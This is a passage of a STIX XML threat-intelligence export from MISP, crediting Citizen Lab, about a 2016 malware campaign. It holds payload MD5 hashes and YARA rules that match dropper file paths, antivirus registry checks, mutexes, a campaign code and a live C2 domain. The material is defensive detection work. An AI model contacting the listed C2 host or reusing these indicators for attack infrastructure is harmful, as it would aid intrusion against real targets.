<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: 397021af7c0284c28db65297a6711235 (MISP Attribute #42)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-8010-4c55-a7c9-49798e96ca05">
<cybox:Object id=":File-581ba817-8010-4c55-a7c9-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">397021af7c0284c28db65297a6711235</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-4924-41de-9ce9-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: dc195d814ec16fe91690b7e949e696f6 (MISP Attribute #43)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: dc195d814ec16fe91690b7e949e696f6 (MISP Attribute #43)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-4924-41de-9ce9-49798e96ca05">
<cybox:Object id=":File-581ba817-4924-41de-9ce9-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">dc195d814ec16fe91690b7e949e696f6</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Payload delivery</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba817-1620-457c-ae64-49798e96ca05" timestamp="2016-11-03T17:11:51+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Payload delivery: cfcd2a90e87156e1a811f9c7b0051002 (MISP Attribute #44)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Payload delivery: cfcd2a90e87156e1a811f9c7b0051002 (MISP Attribute #44)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba817-1620-457c-ae64-49798e96ca05">
<cybox:Object id=":File-581ba817-1620-457c-ae64-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">cfcd2a90e87156e1a811f9c7b0051002</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:11:51+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
</incident:Related_Indicators>
<incident:Leveraged_TTPs>
<incident:Leveraged_TTP>
<stixCommon:Relationship>Payload type</stixCommon:Relationship>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</incident:Leveraged_TTP>
<incident:Leveraged_TTP>
<stixCommon:Relationship>Payload type</stixCommon:Relationship>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</incident:Leveraged_TTP>
</incident:Leveraged_TTPs>
<incident:History>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">Event Threat Level: High</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: SOURCE:CITIZENLAB</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: DETECT</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">MISP Tag: PUBLISHED</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule dubseven_file_set
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for service files loading UP007"
strings:
$file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
$file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
$file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
$file4 = "\\Microsoft\\Internet Explorer\\main.dll"
$file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
$file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
$file7 = "\\Microsoft\\Internet Explorer\\mon"
$file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
//Just a few of these as they differ
3 of ($file*)
}</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule dubseven_dropper_registry_checks
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for registry keys checked for by the dropper"
strings:
$reg1 = "SOFTWARE\\360Safe\\Liveup"
$reg2 = "Software\\360safe"
$reg3 = "SOFTWARE\\kingsoft\\Antivirus"
$reg4 = "SOFTWARE\\Avira\\Avira Destop"
$reg5 = "SOFTWARE\\rising\\RAV"
$reg6 = "SOFTWARE\\JiangMin"
$reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
all of ($reg*)
}</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule dubseven_dropper_dialog_remains
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for related dialog remnants. How rude."
strings:
$dia1 = "fuckMessageBox 1.0" wide
$dia2 = "Rundll 1.0" wide
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
any of them
}</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule maindll_mutex
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Matches on the maindll mutex"
strings:
$mutex = "h31415927tttt"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$mutex
}</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule SLServer_dialog_remains
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for related dialog remnants."
strings:
$slserver = "SLServer" wide
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$slserver
}</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule SLServer_mutex
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for the mutex."
strings:
$mutex = "M&amp;GX^DSF&amp;DA@F"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$mutex
}</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule SLServer_command_and_control
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for the C2 server."
strings:
$c2 = "safetyssl.security-centers.com"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$c2
}</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule SLServer_campaign_code
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for the related campaign code."
strings:
$campaign = "wthkdoc0106"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$campaign
}</incident:Journal_Entry>
</incident:History_Item>
<incident:History_Item>
<incident:Journal_Entry time_precision="second">!Not implemented attribute category/type combination caught! attribute[Artifacts dropped][yara]: rule SLServer_unknown_string
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for a unique string."
strings:
$string = "test-b7fa835a39"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$string
}</incident:Journal_Entry>
</incident:History_Item>
</incident:History>
<incident:Information_Source>
<stixCommon:Identity>
<stixCommon:Name>citizenlab</stixCommon:Name>
</stixCommon:Identity>
<stixCommon:References>
<stixCommon:Reference>https://citizenlab.org/2016/04/between-hong-kong-and-burma/</stixCommon:Reference>
</stixCommon:References>
</incident:Information_Source>
<incident:Handling>
<marking:Marking>
<marking:Controlled_Structure>../../../descendant-or-self::node()</marking:Controlled_Structure>
<marking:Marking_Structure xsi:type='tlpMarking:TLPMarkingStructureType' color="GREEN"/>
</marking:Marking>
</incident:Handling>
</stix:Incident>
</stix:Incidents>
</stix:Package>
</stix:Related_Package>
</stix:Related_Packages>
</stix:STIX_Package>

Some files were not shown because too many files have changed in this diff Show More